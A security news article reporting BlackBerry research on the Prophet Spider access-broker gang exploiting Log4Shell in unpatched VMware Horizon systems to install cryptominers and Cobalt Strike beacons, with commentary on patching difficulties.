The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems. Credit: Thinkstock A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.In a blog published Wednesday, Blackberry’ researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:WindowsTemp7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group. Prophet Spider foothold suggests an uptick in exploitsBlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will perform tasks such as steal data, move through the system laterally, or infect it with ransomware. “If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds. Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the Blackberry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.'”Many VMware implementations remain unpatchedIn their blog post, the Blackberry researchers noted that the exact number of applications—and their various versions—affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation.“It’s difficult for many organizations to scan and patch all their digital assets, even just the external facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them. And if you can’t scan them, then you can’t have an effective vulnerability management program.” Related content feature Top cybersecurity M&A deals for 2023 Fears of recession, rising interest rates, mass tech layoffs, and conservative spending trends are likely to make dealmakers cautious, but an ever-increasing need to defend against bigger and faster attacks will likely keep M&A activity steady in By CSO Staff Sep 22, 2023 24 mins Mergers and Acquisitions Mergers and Acquisitions Mergers and Acquisitions brandpost Unmasking ransomware threat clusters: Why it matters to defenders Similar patterns of behavior among ransomware treat groups can help security teams better understand and prepare for attacks By Joan Goodchild Sep 21, 2023 3 mins Cybercrime news analysis China’s offensive cyber operations support “soft power” agenda in Africa Researchers track Chinese cyber espionage intrusions targeting African industrial sectors. By Michael Hill Sep 21, 2023 5 mins Advanced Persistent Threats Cyberattacks Critical Infrastructure brandpost Proactive OT security requires visibility + prevention You cannot protect your operation by simply watching and waiting. It is essential to have a defense-in-depth approach. By Austen Byers Sep 21, 2023 4 mins Security Podcasts Videos Resources Events SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe